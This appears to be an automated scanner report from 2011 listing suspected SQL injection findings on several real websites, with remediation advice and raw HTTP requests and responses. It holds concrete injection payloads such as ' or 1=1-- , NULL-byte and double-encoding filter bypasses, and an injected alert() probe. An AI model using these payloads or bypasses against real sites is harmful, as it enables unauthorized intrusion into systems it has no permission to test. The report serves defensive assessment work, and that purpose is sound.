SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /adsc'/d647401/46/799689/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:42 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc''/d647401/46/799689/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:42 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 231 Keep-Alive: timeout=120, max=903 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc''/d647401/46/799689/randm.js was not found on t ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d724324/16/752264/randm.js%00' HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:31 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d724324/16/752264/randm.js%00'' HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 21:48:24 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Length: 318 Keep-Alive: timeout=120, max=709 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d724324/16/752264/randm.js was not found on thi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adsc%2527/d724324/27/726813/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:34 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc%2527%2527/d724324/27/726813/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:34 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 235 Keep-Alive: timeout=120, max=890 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc%27%27/d724324/27/726813/randm.js was not found ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d724324/27%00'/752289/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:36 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d724324/27%00''/752289/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:36 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 213 Keep-Alive: timeout=120, max=982 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d724324/27 was not found on this server.</p> </ ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d747416/11/748729%00'/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:37 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d747416/11/748729%00''/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:37 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 220 Keep-Alive: timeout=120, max=902 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d747416/11/748729 was not found on this server. ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /adsc'/d763769/11/770950/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:39 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc''/d763769/11/770950/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:39 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 231 Keep-Alive: timeout=120, max=496 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc''/d763769/11/770950/randm.js was not found on t ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d793570/3%00'/793591/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:41 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d793570/3%00''/793591/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:41 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 212 Keep-Alive: timeout=120, max=906 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d793570/3 was not found on this server.</p> </b ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc%00'/d798609/10/805369/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:42 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc%00''/d798609/10/805369/randm.js HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:42 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 202 Keep-Alive: timeout=120, max=905 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc was not found on this server.</p> </body></html ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21150963'%20or%201%3d1--%20 and 21150963'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /archives/tips21150963'%20or%201%3d1--%20/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response 1
HTTP/1.0 500 Internal Server Error Date: Thu, 03 Feb 2011 19:48:47 GMT Server: Unspecified Content-Length: 0 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/
Request 2
GET /archives/tips21150963'%20or%201%3d2--%20/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response 2
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:49:06 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<meta name="keywords" content="directory advertising options, business directory marketing options, directory options, yellow pages, business directories, Spanish yellow pages, digital directories"> <meta name="description" content="Our directories complement each other to give you an unmatched reach to every audience imaginable including companion directories, bilingual and spanish directories, business to businesss (b2b) directories and digital directories."> <link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/sup ...[SNIP]...
1.10. http://docs.jquery.com/UI/Dialog [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://docs.jquery.com
Path:
/UI/Dialog
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /UI/Dialog?1%2527=1 HTTP/1.1 Host: docs.jquery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:07:57 GMT Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1 X-Powered-By: PHP/5.2.3-1+lenny1 Content-language: en Vary: Accept-Encoding,Cookie Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14991
GET /UI/Dialog?1%2527%2527=1 HTTP/1.1 Host: docs.jquery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:08:53 GMT Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1 X-Powered-By: PHP/5.2.3-1+lenny1 Content-language: en Vary: Accept-Encoding,Cookie Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: private, must-revalidate, max-age=0 Last-modified: Mon, 31 Jan 2011 21:54:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 58688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="con ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221'/abc-development-inc/chicago.aspx/x22 HTTP/1.1 Host: www.bizfind.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 03 Feb 2011 21:48:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 5453 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; path=/ Cache-control: private
GET /15/182221''/abc-development-inc/chicago.aspx/x22 HTTP/1.1 Host: www.bizfind.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 21:48:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11282 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=MHEEKNBBLHOHJNHBIPNHJKNL; path=/ Cache-control: private
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221/abc-development-inc/chicago.aspx/x22' HTTP/1.1 Host: www.bizfind.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 03 Feb 2011 21:48:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 1369 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=CJEEKNBBDCJDLMEACLODNOPI; path=/ Cache-control: private
GET /15/182221/abc-development-inc/chicago.aspx/x22'' HTTP/1.1 Host: www.bizfind.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 21:48:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11302 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=EJEEKNBBLAHNPDBHLMHJLNKM; path=/ Cache-control: private
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221'/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response 1
HTTP/1.1 500 Internal Server Error Date: Fri, 04 Feb 2011 18:01:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 5859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=NIMOGJOBDKLPJKOOCEPBMLJI; path=/ Cache-control: private
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221/abc-development-inc/chicago.aspx/x22'/%22ns=%22alert(0x0006C1) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response 1
HTTP/1.1 500 Internal Server Error Date: Fri, 04 Feb 2011 18:01:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 1495 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=BNMOGJOBONCKHCHLACPLEBGD; path=/ Cache-control: private
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns'=%22alert(0x0006C1) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response 1
HTTP/1.1 500 Internal Server Error Date: Fri, 04 Feb 2011 18:01:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 1495 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=DPMOGJOBNNLPMDCLNBMEICJC; path=/ Cache-control: private
The CstrStatus cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CstrStatus cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer=""; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
